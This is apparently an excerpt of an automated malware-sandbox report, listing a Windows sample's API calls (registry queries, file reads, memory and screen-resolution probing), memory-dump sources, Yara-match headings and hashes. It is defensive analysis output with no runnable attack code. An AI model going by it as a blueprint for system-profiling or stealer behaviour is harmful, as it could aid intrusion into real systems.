                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,002B140E), ref: 002B9A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,002B140E), ref: 002B9AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,002B140E), ref: 002B9AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,002B140E,00000000,?,?,?,002B140E), ref: 002B9AE0
                                  • LocalFree.KERNEL32(?,?,?,?,002B140E), ref: 002B9B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,002B140E), ref: 002B9B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 651b00091ba678b0dfade5c8b68bda7d2e0f3c7f46cd822f2099d4e059365c3a
                                  • Instruction ID: ffeb1033750fb771e7aca953f6a0cb4105b1e951c16ecbe0ceb257c18d2de7ab
                                  • Opcode Fuzzy Hash: 651b00091ba678b0dfade5c8b68bda7d2e0f3c7f46cd822f2099d4e059365c3a
                                  • Instruction Fuzzy Hash: B611217161020AAFEB10DF69DCC4AFA776CFB04784F104169FA15EA181DB709D50CB64
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5B14
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 002D5B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 002D5B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 002D5B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: ec8ec891fc2366e820c9ca6025cdcf6339a2974f75abaeba5f55dbb0f2061566
                                  • Instruction ID: f297a9a4804aad14fdcc6b114905e5fb264128ca0a252c2647a7d60fbf7ede86
                                  • Opcode Fuzzy Hash: ec8ec891fc2366e820c9ca6025cdcf6339a2974f75abaeba5f55dbb0f2061566
                                  • Instruction Fuzzy Hash: 02418172B105199FCF08DF6CC995AAEBBF5EB88314F14822AE909E7344E670DD10CB90
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7D58
                                    • Part of subcall function 002DA1C0: std::exception::exception.LIBCMT ref: 002DA1D5
                                    • Part of subcall function 002DA1C0: std::exception::exception.LIBCMT ref: 002DA1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: 5deeeffd4bfeae1901dc1047d750588b9c9a9bf483181078a3661e3640a6551c
                                  • Instruction ID: a5a3fca0084105fa7930a4b4e518093754b7ffbad814e5b64b4bd1ad80c8a044
                                  • Opcode Fuzzy Hash: 5deeeffd4bfeae1901dc1047d750588b9c9a9bf483181078a3661e3640a6551c
                                  • Instruction Fuzzy Hash: 6421A2323243018BD7249E6CD881F3AB7E9BF91760F204B6EE4568B381D771DC608BA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002D33EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D33F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 002D3411
                                  • wsprintfA.USER32 ref: 002D3437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: dd5b4bb2bb2d837115da405f0ae2a8a3cb2f3e14af5d3486f33720891ef9a0e8
                                  • Instruction ID: 3e4e14e953b01a5cc7667182c70876ffe70249d7e42fc41329d40854b06f6edf
                                  • Opcode Fuzzy Hash: dd5b4bb2bb2d837115da405f0ae2a8a3cb2f3e14af5d3486f33720891ef9a0e8
                                  • Instruction Fuzzy Hash: 53012871A10254AFDB14DF98CC45BAEB7B8FB45710F40423AF906E7380D7B45D0086A5
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,011CDAF0,00000000,00020119,?), ref: 002CD7F5
                                  • RegQueryValueExA.ADVAPI32(?,011CE298,00000000,00000000,00000000,000000FF), ref: 002CD819
                                  • RegCloseKey.ADVAPI32(?), ref: 002CD823
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CD848
                                  • lstrcat.KERNEL32(?,011CE4F0), ref: 002CD85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 4d194018908de5308d3240ae9e8325a72c56fbd71acfb2b38a7d943282278b0a
                                  • Instruction ID: e20ed4ca7a17b406c0888c1a7e50ce540a0dc42f36fd2e6882713ffea85feef1
                                  • Opcode Fuzzy Hash: 4d194018908de5308d3240ae9e8325a72c56fbd71acfb2b38a7d943282278b0a
                                  • Instruction Fuzzy Hash: B9416271A2024C9FCB54EF64EC82FDE7778AB54344F508178B50DA7252EE30AA998F91
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C7F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C7F60
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C7FA5
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C7FD3
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C8007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: af0de4c0967b9d7e82d1a9c1b42cb9ab66458887c89ab2e8aca90dacb27b58d4
                                  • Instruction ID: 40d62d9099c0760d8336709fa0dcde78ee6e03af537800e54fdccc4c30ab5904
                                  • Opcode Fuzzy Hash: af0de4c0967b9d7e82d1a9c1b42cb9ab66458887c89ab2e8aca90dacb27b58d4
                                  • Instruction Fuzzy Hash: 1A418B3062421ADFCB20DF69D8C0EAEB7B4FF55340B11429DE8059B251DB70AA65CF91
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C80BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C80EA
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C8102
                                  • lstrlen.KERNEL32(00000000), ref: 002C8140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C816F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 56fd875e245c2b3c0cb31a0c873a75eb59856edad8300c8ebe47fd0494ac5e2a
                                  • Instruction ID: 24d3de3ed6f7a0fd67dbb3e7f106dfc06fabfcd8f3822b5cfe0942675dfcef30
                                  • Opcode Fuzzy Hash: 56fd875e245c2b3c0cb31a0c873a75eb59856edad8300c8ebe47fd0494ac5e2a
                                  • Instruction Fuzzy Hash: 3441BC31620206EBDB21DF68D984FAABBF4EF44340F14866CA849D7245EF74ED65CB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002D3166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,011BBF68,00000000,00020119,?), ref: 002D318C
                                  • RegQueryValueExA.ADVAPI32(?,011CD870,00000000,00000000,00000000,000000FF), ref: 002D31A7
                                  • RegCloseKey.ADVAPI32(?), ref: 002D31B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 5100a1ec498b9d909ef29c53e09fb4f242ee8e1ff662807e47e4c8cea1fcfcb1
                                  • Instruction ID: 6d8ad01a65d41eb1d496b76a5a22a1d00e3dc3ffb6989fe8839cd5a1ab318cbf
                                  • Opcode Fuzzy Hash: 5100a1ec498b9d909ef29c53e09fb4f242ee8e1ff662807e47e4c8cea1fcfcb1
                                  • Instruction Fuzzy Hash: 17116076A40245AFD710CF94EC85FABB7BCE745710F10426AFA0997381DB74590087A5
                                  APIs
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 2b2c1a919c77348fd681d0d5befe8ca796fdc64f5c2efc651d23d21a14bf7ba1
                                  • Instruction ID: d2c743c1f70ad2f263ff2ee13b716c04d32424c01043174de5e0e67f85eb2ec1
                                  • Opcode Fuzzy Hash: 2b2c1a919c77348fd681d0d5befe8ca796fdc64f5c2efc651d23d21a14bf7ba1
                                  • Instruction Fuzzy Hash: 3C41E77151479D9EDB218F248C89FFB7BFC9B45304F1444E9F98A86282E2719E958F20
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002B8996
                                    • Part of subcall function 002DA1C0: std::exception::exception.LIBCMT ref: 002DA1D5
                                    • Part of subcall function 002DA1C0: std::exception::exception.LIBCMT ref: 002DA1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002B89CD
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: 2d3667cba2f9ad7165a5c42d6a744fc12cae55919b4c13c10396eb07915bda93
                                  • Instruction ID: a351db9cc399cd50ceb9056c9c426cb6b14ae1ca69697e50abfb620787624cac
                                  • Opcode Fuzzy Hash: 2d3667cba2f9ad7165a5c42d6a744fc12cae55919b4c13c10396eb07915bda93
                                  • Instruction Fuzzy Hash: 2121D8723206508BCB209E5CE840AAAF79DDBA17E5B24093FF159CB341CB71DC61C7A6
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002B8883
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: fb42c4af47b80f9b80c2b2336477259cece428c6bccef469794cb385726027d0
                                  • Instruction ID: a44c5b1297e8aff42839e78524ce366cdebf8ca72144f0013cfe3050b4304398
                                  • Opcode Fuzzy Hash: fb42c4af47b80f9b80c2b2336477259cece428c6bccef469794cb385726027d0
                                  • Instruction Fuzzy Hash: FC3197B5E005159BCB08DF58C8916AEBBB6EB88350F188269E919DB344DB30ED11CB91
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5922
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5935
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: b45d23702d2c2c32bfd45894fde210edb9eed4c2db4143c592a85824927df855
                                  • Instruction ID: 478e3716fa7cbc68d3676244209fccbd151e6712fa9f51606268f482ac065e96
                                  • Opcode Fuzzy Hash: b45d23702d2c2c32bfd45894fde210edb9eed4c2db4143c592a85824927df855
                                  • Instruction Fuzzy Hash: 8F119A30324A60CBC3218E2CA810B4AB7E5AB92760F200A5FE0D187785CBB1EC51CBA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,002DA430,000000FF), ref: 002D3D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D3D27
                                  • wsprintfA.USER32 ref: 002D3D37
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 938a611d4f4b5fb84ba21c479a67af745e4ebedb2098627fe49d8edfbe45a0a7
                                  • Instruction ID: 90a2c913d6a3950d66bb67d817c60ad661856bbd956932e5cd7078f133036178
                                  • Opcode Fuzzy Hash: 938a611d4f4b5fb84ba21c479a67af745e4ebedb2098627fe49d8edfbe45a0a7
                                  • Instruction Fuzzy Hash: F601D271680390BFE7209B54DC8AF6ABB7CFB46B61F400125FA059B3D1D7B41D00CAA9
                                  APIs
                                  • __getptd.LIBCMT ref: 002D9279
                                    • Part of subcall function 002D87FF: __amsg_exit.LIBCMT ref: 002D880F
                                  • __amsg_exit.LIBCMT ref: 002D9299
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit$__getptd
                                  • String ID: Xu.$Xu.
                                  • API String ID: 441000147-1797894820
                                  • Opcode ID: 802a81463c0625dcd4dcdaf13041cfba26bc04108bbe11a7587784315d086802
                                  • Instruction ID: e9f5461f13f2d5e40c8212b55b5bc66d4035d4f6d5de3a8a5ec7dacb0161324c
                                  • Opcode Fuzzy Hash: 802a81463c0625dcd4dcdaf13041cfba26bc04108bbe11a7587784315d086802
                                  • Instruction Fuzzy Hash: 9B01A132AA9752ABDA11AF69A48D799B3506F00710F540017F80467781DB346DA0DBD5
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002B8737
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 3d5cc9280fdbd9962503ada613f6dfbda0cea01b3a0b134cc63cb42c0a5e002d
                                  • Instruction ID: c7879997444fd4febae354ca36f1074bea987d28eaabfd488f9fd25424570deb
                                  • Opcode Fuzzy Hash: 3d5cc9280fdbd9962503ada613f6dfbda0cea01b3a0b134cc63cb42c0a5e002d
                                  • Instruction Fuzzy Hash: 32F06D3BB600220B8214643E8D8449EE94A56E53D437AD765E81EEF359DC70EC92E5D4
                                  APIs
